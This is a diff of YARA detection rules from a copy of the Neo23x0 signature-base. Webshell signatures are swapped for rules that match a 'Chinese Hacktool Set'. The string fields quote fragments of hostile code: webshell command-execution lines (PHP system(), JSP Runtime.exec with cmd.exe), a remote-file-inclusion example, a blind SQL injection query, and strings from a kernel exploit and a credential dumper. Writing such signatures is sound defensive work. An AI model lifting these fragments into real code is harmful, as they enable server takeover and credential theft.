+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_cn_hacktools.yar#L9-L28"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "5b334d494564393f419af745dc1eeec7"
-		logic_hash = "e81e5345bbe07ca85c94a3d8411f0dd3c418689ccae7115c098f718f9093b3bf"
-		score = 75
+		hash = "115d87d7e7a3d08802a9e5fd6cd08e2ec633c367"
+		logic_hash = "74be6bd9c6e01cc4ec7785b6950c8cf6acf549c06990a9d1734f4a3487a04ba7"
+		score = 70
 		quality = 85
-		tags = ""
+		tags = "FILE"
 
 	strings:
-		$s1 = "<title>Ru24PostWebShell - \".$_POST['cmd'].\"</title>" fullword
-		$s3 = "if ((!$_POST['cmd']) || ($_POST['cmd']==\"\")) { $_POST['cmd']=\"id;pwd;uname -a"
-		$s4 = "Writed by DreAmeRz" fullword
+		$s1 = "Valid_Global_Groups: checking group membership of '%s\\%s'." fullword ascii
+		$s2 = "Usage: %s [-D domain][-G][-P][-c][-d][-h]" fullword ascii
+		$s3 = "-D    default user Domain" fullword ascii
+		$fp1 = "Panda Security S.L." ascii wide
 
 	condition:
-		1 of them
+		uint16( 0 ) == 0x5a4d and filesize < 380KB and all of ( $s* ) and not 1 of ( $fp* )
 }
-rule SIGNATURE_BASE_Dtool_Pro_Php
+rule SIGNATURE_BASE_WAF_Bypass : FILE
 {
 	meta:
-		description = "Semi-Auto-generated  - file DTool Pro.php.txt"
-		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		id = "c02c522c-8418-5760-869a-52b41785bebc"
-		date = "2016-02-15"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L4772-L4784"
+		description = "Chinese Hacktool Set - file WAF-Bypass.exe"
+		author = "Florian Roth (Nextron Systems)"
+		id = "d9f40934-873b-5e73-9198-987966027edc"
+		date = "2015-06-13"
+		modified = "2023-12-05"
+		reference = "http://tools.zjqhr.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_cn_hacktools.yar#L30-L48"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "366ad973a3f327dfbfb915b0faaea5a6"
-		logic_hash = "e8f8b4ca2ab4607e700e897671fd230280763a70897b8ccfc31b3bcb7f2a1f4a"
+		hash = "860a9d7aac2ce3a40ac54a4a0bd442c6b945fa4e"
+		logic_hash = "e66d51b465e5d919555084d299a22f07a949a0a9adf4a3f246f6b5222d39b91a"
 		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "r3v3ng4ns\\nDigite"
-		$s1 = "if(!@opendir($chdir)) $ch_msg=\"dtool: line 1: chdir: It seems that the permissi"
-		$s3 = "if (empty($cmd) and $ch_msg==\"\") echo (\"Comandos Exclusivos do DTool Pro\\n"
+		$s1 = "Email: blacksplitn@gmail.com" fullword wide
+		$s2 = "User-Agent:" fullword wide
+		$s3 = "Send Failed.in RemoteThread" fullword ascii
+		$s4 = "www.example.com" fullword wide
+		$s5 = "Get Domain:%s IP Failed." fullword ascii
+		$s6 = "Connect To Server Failed." fullword ascii
 
 	condition:
-		1 of them
+		uint16( 0 ) == 0x5a4d and filesize < 7992KB and 5 of them
 }
-rule SIGNATURE_BASE_Telnetd_Pl
+rule SIGNATURE_BASE_Guilin_Veterans_Cookie_Spoofing_Tool : FILE
 {
 	meta:
-		description = "Semi-Auto-generated  - file telnetd.pl.txt"
-		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		id = "05b5d247-3133-5902-a2ee-b84fa89c7f32"
-		date = "2016-02-15"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L4785-L4799"
+		description = "Chinese Hacktool Set - file Guilin veterans cookie spoofing tool.exe"
+		author = "Florian Roth (Nextron Systems)"
+		id = "13f78e0b-c975-5879-9af1-8c619d6c94a9"
+		date = "2015-06-13"
+		modified = "2023-01-27"
+		reference = "http://tools.zjqhr.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_cn_hacktools.yar#L50-L67"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "5f61136afd17eb025109304bd8d6d414"
-		logic_hash = "faf21758b311fa4c2d11cd60169e6c9a67282cf739b73664456691361a480419"
+		hash = "06b1969bc35b2ee8d66f7ce8a2120d3016a00bb1"
+		logic_hash = "5fd136f44ebce28db4f77f2f8730eb67fc4c2d58921b73378b8d87e1444a4b67"
 		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "0ldW0lf" fullword
-		$s1 = "However you are lucky :P"
-		$s2 = "I'm FuCKeD"
-		$s3 = "ioctl($CLIENT{$client}->{shell}, &TIOCSWINSZ, $winsize);#"
-		$s4 = "atrix@irc.brasnet.org"
+		$s0 = "kernel32.dll^G" fullword ascii
+		$s1 = "\\.Sus\"B" ascii
+		$s4 = "u56Load3" fullword ascii
+		$s11 = "O MYTMP(iM) VALUES (" ascii
 
 	condition:
-		1 of them
+		uint16( 0 ) == 0x5a4d and filesize < 1387KB and all of them
 }
-rule SIGNATURE_BASE_Php_Include_W_Shell_Php
+rule SIGNATURE_BASE_Marathontool : FILE
 {
 	meta:
-		description = "Semi-Auto-generated  - file php-include-w-shell.php.txt"
-		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		id = "ddcf9031-2ec8-5a86-8326-60e4a699f494"
-		date = "2016-02-15"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L4800-L4811"
+		description = "Chinese Hacktool Set - file MarathonTool.exe"
+		author = "Florian Roth (Nextron Systems)"
+		id = "23513361-ecac-5ddb-92b9-4dd8da12e8db"
+		date = "2015-06-13"
+		modified = "2023-12-05"
+		reference = "http://tools.zjqhr.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_cn_hacktools.yar#L69-L84"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "4e913f159e33867be729631a7ca46850"
-		logic_hash = "a63910d97b7ef447b2cadb7de12943d3dbb6eada27d3097b8acf58d9b65b6f60"
+		hash = "084a27cd3404554cc799d0e689f65880e10b59e3"
+		logic_hash = "2d52d640ef44d933791d1da0d1263dba15702180c730500e04d364dd6b4d6081"
 		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "$dataout .= \"<td><a href='$MyLoc?$SREQ&incdbhost=$myhost&incdbuser=$myuser&incd"
-		$s1 = "if($run == 1 && $phpshellapp && $phpshellhost && $phpshellport) $strOutput .= DB"
+		$s0 = "MarathonTool" ascii
+		$s17 = "/Blind SQL injection tool based in heavy queries" fullword ascii
+		$s18 = "SELECT UNICODE(SUBSTRING((system_user),{0},1))" fullword wide
 
 	condition:
-		1 of them
+		uint16( 0 ) == 0x5a4d and filesize < 1040KB and all of them
 }
-rule SIGNATURE_BASE_Safe0Ver_Shell__Safe_Mod_Bypass_By_Evilc0Der_Php
+rule SIGNATURE_BASE_PLUGIN_Trackid : FILE
 {
 	meta:
-		description = "Semi-Auto-generated  - file Safe0ver Shell -Safe Mod Bypass By Evilc0der.php.txt"
-		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		id = "25971f62-33ee-5ed6-8d72-118be5bd2deb"
-		date = "2016-02-15"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L4812-L4824"
+		description = "Chinese Hacktool Set - file TracKid.dll"
+		author = "Florian Roth (Nextron Systems)"
+		id = "8dd77df1-748e-5778-be40-38b794c74b97"
+		date = "2015-06-13"
+		modified = "2023-12-05"
+		reference = "http://tools.zjqhr.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_cn_hacktools.yar#L86-L104"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "6163b30600f1e80d2bb5afaa753490b6"
-		logic_hash = "46f6bb38f1175e02b03047c06a7aed968b1c1ce2e28cc4b88e15703040e91592"
+		hash = "a114181b334e850d4b33e9be2794f5bb0eb59a09"
+		logic_hash = "a62112dbf2ef696e4eb7f6787a0e0930c29d9834f46c87493954498fa4b375f6"
 		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "Safe0ver" fullword
-		$s1 = "Script Gecisi Tamamlayamadi!"
-		$s2 = "document.write(unescape('%3C%68%74%6D%6C%3E%3C%62%6F%64%79%3E%3C%53%43%52%49%50%"
+		$s0 = "E-mail: cracker_prince@163.com" fullword ascii
+		$s1 = ".\\TracKid Log\\%s.txt" fullword ascii
+		$s2 = "Coded by prince" fullword ascii
+		$s3 = "TracKid.dll" fullword ascii
+		$s4 = ".\\TracKid Log" fullword ascii
+		$s5 = "%08x -- %s" fullword ascii
 
 	condition:
-		1 of them
+		uint16( 0 ) == 0x5a4d and filesize < 200KB and 3 of them
 }
-rule SIGNATURE_BASE_Shell_Php_Php
+rule SIGNATURE_BASE_Pc_Pc2015 : FILE
 {
 	meta:
-		description = "Semi-Auto-generated  - file shell.php.php.txt"
-		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		id = "eaf243cb-fa26-5f34-a724-60a08acff636"
-		date = "2016-02-15"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L4825-L4837"
+		description = "Chinese Hacktool Set - file pc2015.exe"
+		author = "Florian Roth (Nextron Systems)"
+		id = "aa7c0b5e-91c3-52cc-9e06-b4648d0b8825"
+		date = "2015-06-13"
+		modified = "2023-12-05"
+		reference = "http://tools.zjqhr.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_cn_hacktools.yar#L106-L121"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "1a95f0163b6dea771da1694de13a3d8d"
-		logic_hash = "dbd08e71dc512f8dcf009150fb4448cd3608291ef9078c7e6b86e6f8d820bd94"
+		hash = "de4f098611ac9eece91b079050b2d0b23afe0bcb"
+		logic_hash = "34d66d8b9e637c067ec2d9387b7b57458312d75892e33b95eb1095200799cf3b"
 		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "/* We have found the parent dir. We must be carefull if the parent " fullword
-		$s2 = "$tmpfile = tempnam('/tmp', 'phpshell');"
-		$s3 = "if (ereg('^[[:blank:]]*cd[[:blank:]]+([^;]+)$', $command, $regs)) {" fullword
+		$s0 = "\\svchost.exe" ascii
+		$s1 = "LON\\OD\\O-\\O)\\O%\\O!\\O=\\O9\\O5\\O1\\O" fullword ascii
+		$s8 = "%s%08x.001" fullword ascii
 
 	condition:
-		1 of them
+		uint16( 0 ) == 0x5a4d and filesize < 309KB and all of them
 }
-rule SIGNATURE_BASE_Telnet_Cgi
+rule SIGNATURE_BASE_Sekurlsa : FILE
 {
 	meta:
-		description = "Semi-Auto-generated  - file telnet.cgi.txt"
-		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		id = "4ca3dace-cd80-58e4-a4de-47dcc64dac0e"
-		date = "2016-02-15"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L4838-L4850"
+		description = "Chinese Hacktool Set - file sekurlsa.dll"
+		author = "Florian Roth (Nextron Systems)"
+		id = "b65dc578-e5a1-57e6-bd98-2c45cd07e857"
+		date = "2015-06-13"
+		modified = "2023-12-05"
+		reference = "http://tools.zjqhr.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_cn_hacktools.yar#L123-L139"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "dee697481383052980c20c48de1598d1"
-		logic_hash = "689c1d43c64aa7469989686c60fc9ab46acde42fdf3c1157bae1e2b8373c845f"
+		hash = "6acecd18fc7da1c5eb0d04e848aae9ce59d2b1b5"
+		logic_hash = "dea05c7f19a834cc936c452ca2f6f4286e6c3dae002747c27913960199451c3f"
 		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "W A R N I N G: Private Server"
-		$s2 = "print \"Set-Cookie: SAVEDPWD=;\\n\"; # remove password cookie"
-		$s3 = "$Prompt = $WinNT ? \"$CurrentDir> \" : \"[admin\\@$ServerName $C"
+		$s1 = "Bienvenue dans un processus distant" fullword wide
+		$s2 = "Format d'appel invalide : addLogonSession [idSecAppHigh] idSecAppLow Utilisateur" wide
+		$s3 = "SECURITY\\Policy\\Secrets" fullword wide
+		$s4 = "Injection de donn" fullword wide
 
 	condition:
-		1 of them
+		uint16( 0 ) == 0x5a4d and filesize < 1150KB and all of them
 }
-rule SIGNATURE_BASE_Ironshell_Php
+rule SIGNATURE_BASE_Mysqlfast : FILE
 {
 	meta:
-		description = "Semi-Auto-generated  - file ironshell.php.txt"
-		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		id = "0d63ad03-4d1d-535f-8afe-3edaf1bf4010"
-		date = "2016-02-15"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L4851-L4865"
+		description = "Chinese Hacktool Set - file mysqlfast.exe"
+		author = "Florian Roth (Nextron Systems)"
+		id = "93ee91cd-a6b8-5ed9-b750-779f88032be6"
+		date = "2015-06-13"
+		modified = "2023-12-05"
+		reference = "http://tools.zjqhr.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_cn_hacktools.yar#L141-L159"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "8bfa2eeb8a3ff6afc619258e39fded56"
-		logic_hash = "23574299ee2bb33c3f71102adf71ac8f09b6f8ece5f798beacb9b2432d297ee7"
+		hash = "32b60350390fe7024af7b4b8fbf50f13306c546f"
+		logic_hash = "3ea75954831e705d0d25efa115288e66868d9b814f0990fd048bbe1209a8d933"
 		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "www.ironwarez.info"
-		$s1 = "$cookiename = \"wieeeee\";"
-		$s2 = "~ Shell I"
-		$s3 = "www.rootshell-team.info"
-		$s4 = "setcookie($cookiename, $_POST['pass'], time()+3600);"
+		$s2 = "Invalid password hash: %s" fullword ascii
+		$s3 = "-= MySql Hash Cracker =- " fullword ascii
+		$s4 = "Usage: %s hash" fullword ascii
+		$s5 = "Hash: %08lx%08lx" fullword ascii
+		$s6 = "Found pass: " fullword ascii
+		$s7 = "Pass not found" fullword ascii
 
 	condition:
-		1 of them
+		uint16( 0 ) == 0x5a4d and filesize < 900KB and 4 of them
 }
-rule SIGNATURE_BASE_Backdoorfr_Php
+rule SIGNATURE_BASE_Dtools2_02_Dtools : FILE
 {
 	meta:
-		description = "Semi-Auto-generated  - file backdoorfr.php.txt"
-		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		id = "5ba2b617-a873-5e80-9cfc-c61cc8d605f3"
-		date = "2016-02-15"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L4866-L4877"
+		description = "Chinese Hacktool Set - file DTools.exe"
+		author = "Florian Roth (Nextron Systems)"
+		id = "fc812797-12d8-596a-8ebe-dd8b0d7a4b7e"
+		date = "2015-06-13"
+		modified = "2023-12-05"
+		reference = "http://tools.zjqhr.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_cn_hacktools.yar#L161-L179"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "91e4afc7444ed258640e85bcaf0fecfc"
-		logic_hash = "40a6fb41a65fd35acb7cdc36fdda90f5dc54b641adc3ba9eaae29c5e46622206"
+		hash = "9f99771427120d09ec7afa3b21a1cb9ed720af12"
+		logic_hash = "51e30d39f388546ac233b4b97a38f225c90d2f006bc509dd7eecfb408aef9be5"
 		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "www.victime.com/index.php?page=http://emplacement_de_la_backdoor.php , ou en tan"
-		$s2 = "print(\"<br>Provenance du mail : <input type=\\\"text\\\" name=\\\"provenanc"
+		$s0 = "kernel32.dll" ascii
+		$s1 = "TSETPASSWORDFORM" fullword wide
+		$s2 = "TGETNTUSERNAMEFORM" fullword wide
+		$s3 = "TPORTFORM" fullword wide
+		$s4 = "ShellFold" fullword ascii
+		$s5 = "DefaultPHotLigh" fullword ascii
 
 	condition:
-		1 of them
+		uint16( 0 ) == 0x5a4d and filesize < 2000KB and all of them
 }
-rule SIGNATURE_BASE_Aspydrv_Asp
+rule SIGNATURE_BASE_Dll_Packetx : FILE
 {
 	meta:
-		description = "Semi-Auto-generated  - file aspydrv.asp.txt"
-		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		id = "4420d13e-7015-5083-ba08-b41bf28b00c2"
-		date = "2016-02-15"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L4878-L4891"
+		description = "Chinese Hacktool Set - file PacketX.dll - ActiveX wrapper for WinPcap packet capture library"
+		author = "Florian Roth (Nextron Systems)"
+		id = "19ab5977-934d-5e3f-8bba-925bb57bf486"
+		date = "2015-06-13"
+		modified = "2023-12-05"
+		reference = "http://tools.zjqhr.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_cn_hacktools.yar#L181-L196"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "1c01f8a88baee39aa1cebec644bbcb99"
-		logic_hash = "64912d7521d4bff33b5f3a78525bf4ed94246f5933753bed7ca02bedffc85f0f"
-		score = 60
+		hash = "3f0908e0a38512d2a4fb05a824aa0f6cf3ba3b71"
+		logic_hash = "161d174376c599b1b794fa1174349ae12b198842d89769baec4b9664729a3983"
+		score = 50
 		quality = 85
-		tags = ""
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "If mcolFormElem.Exists(LCase(sIndex)) Then Form = mcolFormElem.Item(LCase(sIndex))"
-		$s1 = "password"
-		$s2 = "session(\"shagman\")="
+		$s9 = "[Failed to load winpcap packet.dll." wide
+		$s10 = "PacketX Version" wide
 
 	condition:
-		2 of them
+		uint16( 0 ) == 0x5a4d and filesize < 1920KB and all of them
 }
-rule SIGNATURE_BASE_Cmdjsp_Jsp
+rule SIGNATURE_BASE_Sqldbx_Zhs : FILE
 {
 	meta:
-		description = "Semi-Auto-generated  - file cmdjsp.jsp.txt"
-		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		id = "048478a8-9622-54c7-80ed-e4e223d14500"
-		date = "2016-02-15"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L4892-L4905"
+		description = "Chinese Hacktool Set - file SqlDbx_zhs.exe"
+		author = "Florian Roth (Nextron Systems)"
+		id = "31c49755-f1bd-5ecb-91ff-1040e40983ab"
+		date = "2015-06-13"
+		modified = "2023-12-05"
+		reference = "http://tools.zjqhr.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_cn_hacktools.yar#L198-L217"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "b815611cc39f17f05a73444d699341d4"
-		logic_hash = "8b0e425c7d71ea2c536192ff186665e7f0fbdbc0e0d195d7107ac57cf9bd1773"
+		hash = "e34228345498a48d7f529dbdffcd919da2dea414"
+		logic_hash = "b0215d29c58c252c1717f08135eab65794a99ed669c2225bcba690ae7d7a034c"
 		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "// note that linux = cmd and windows = \"cmd.exe /c + cmd\" " fullword
-		$s1 = "Process p = Runtime.getRuntime().exec(\"cmd.exe /C \" + cmd);" fullword
-		$s2 = "cmdjsp.jsp"
-		$s3 = "michaeldaw.org" fullword
+		$s0 = "S.failed_logins \"Failed Login Attempts\", " fullword ascii
+		$s7 = "SELECT ROLE, PASSWORD_REQUIRED FROM SYS.DBA_ROLES ORDER BY ROLE" fullword ascii
+		$s8 = "SELECT spid 'SPID', status 'Status', db_name (dbid) 'Database', loginame 'Login'" ascii
+		$s9 = "bcp.exe <:schema:>.<:table:> out \"<:file:>\" -n -S <:server:> -U <:user:> -P <:" ascii
+		$s11 = "L.login_policy_name AS \"Login Policy\", " fullword ascii
+		$s12 = "mailto:support@sqldbx.com" fullword ascii
+		$s15 = "S.last_login_time \"Last Login\", " fullword ascii
 
 	condition:
-		2 of them
+		uint16( 0 ) == 0x5a4d and 4 of them
 }
-rule SIGNATURE_BASE_H4Ntu_Shell__Powered_By_Tsoi_
+rule SIGNATURE_BASE_Ms10048_X86 : FILE
 {
 	meta:
-		description = "Semi-Auto-generated  - file h4ntu shell [powered by tsoi].txt"
-		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		id = "186358e6-88a3-5fad-b1ba-a49b2a5dea1c"
-		date = "2016-02-15"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L4906-L4917"
+		description = "Chinese Hacktool Set - file ms10048-x86.exe"
+		author = "Florian Roth (Nextron Systems)"
+		id = "373f0419-5a7d-5f01-968c-5d3e7b1c0670"
+		date = "2015-06-13"
+		modified = "2023-12-05"
+		reference = "http://tools.zjqhr.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_cn_hacktools.yar#L219-L237"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "06ed0b2398f8096f1bebf092d0526137"
-		logic_hash = "32c620a4ed3f7a8640928e2211516978c12cfbdedb7d96e923303740407b5a1c"
+		hash = "e57b453966e4827e2effa4e153f2923e7d058702"
+		logic_hash = "50e45cae87f5d1cc4903a16f9283dd751d90cde0c71f3124467b4ff15bd34f1b"
 		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "h4ntu shell"
-		$s1 = "system(\"$cmd 1> /tmp/cmdtemp 2>&1; cat /tmp/cmdtemp; rm /tmp/cmdtemp\");"
+		$s1 = "[ ] Resolving PsLookupProcessByProcessId" fullword ascii
+		$s2 = "The target is most likely patched." fullword ascii
+		$s3 = "Dojibiron by Ronald Huizer, (c) master@h4cker.us ." fullword ascii
+		$s4 = "[ ] Creating evil window" fullword ascii
+		$s5 = "%sHANDLEF_INDESTROY" fullword ascii
+		$s6 = "[+] Set to %d exploit half succeeded" fullword ascii
 
 	condition:
-		1 of them
+		uint16( 0 ) == 0x5a4d and filesize < 100KB and 4 of them
 }
-rule SIGNATURE_BASE_Ajan_Asp
+rule SIGNATURE_BASE_Dos_Ch : FILE
 {
 	meta:
-		description = "Semi-Auto-generated  - file Ajan.asp.txt"
-		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		id = "6040fd88-b992-5110-8b37-7711ace30b1a"
-		date = "2016-02-15"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L4918-L4930"
+		description = "Chinese Hacktool Set - file ch.exe"
+		author = "Florian Roth (Nextron Systems)"
+		id = "2e8319de-fe54-5083-968c-4707d127f072"
+		date = "2015-06-13"
+		modified = "2023-12-05"
+		reference = "http://tools.zjqhr.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_cn_hacktools.yar#L239-L257"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "b6f468252407efc2318639da22b08af0"
-		logic_hash = "13988af864a62ca04501288d4f2d830815ab453b14cef6795fe993db1dd1a9ef"
+		hash = "60bbb87b08af840f21536b313a76646e7c1f0ea7"
+		logic_hash = "49ab2c75267c2ed5c15c8fbdc6fa0f8826f6e7a45a2861d6ba4b293ffca6bcd6"
 		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "c:\\downloaded.zip"
-		$s2 = "Set entrika = entrika.CreateTextFile(\"c:\\net.vbs\", True)" fullword
-		$s3 = "http://www35.websamba.com/cybervurgun/"
+		$s0 = "/Churraskito/-->Usage: Churraskito.exe \"command\" " fullword ascii
+		$s4 = "fuck,can't find WMI process PID." fullword ascii
+		$s5 = "/Churraskito/-->Found token %s " fullword ascii
+		$s8 = "wmiprvse.exe" fullword ascii
+		$s10 = "SELECT * FROM IIsWebInfo" fullword ascii
+		$s17 = "WinSta0\\Default" fullword ascii
 
 	condition:
-		1 of them
+		uint16( 0 ) == 0x5a4d and filesize < 260KB and 3 of them
 }
-rule SIGNATURE_BASE_PHANTASMA_Php
+rule SIGNATURE_BASE_Dubrute_Dubrute : FILE
 {
 	meta:
-		description = "Semi-Auto-generated  - file PHANTASMA.php.txt"
-		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		id = "21ff4cee-9cdc-57d1-9c43-e033fdb47de0"
-		date = "2016-02-15"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L4931-L4944"
+		description = "Chinese Hacktool Set - file DUBrute.exe"
+		author = "Florian Roth (Nextron Systems)"
+		id = "10aa2017-d563-5953-8672-dbc13ff6b3cf"
+		date = "2015-06-13"
+		modified = "2023-12-05"
+		reference = "http://tools.zjqhr.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_cn_hacktools.yar#L259-L275"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "52779a27fa377ae404761a7ce76a5da7"
-		logic_hash = "d4a2a1bcc1ff3264b35f2b05d7de664b56807977f2a793fd87206f046a185d3b"
+		hash = "8aaae91791bf782c92b97c6e1b0f78fb2a9f3e65"
+		logic_hash = "1e6d8bd24a37e3f4b7de88989251ae904128ff1bf766d4a4408ff8990c6dfd2f"
 		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
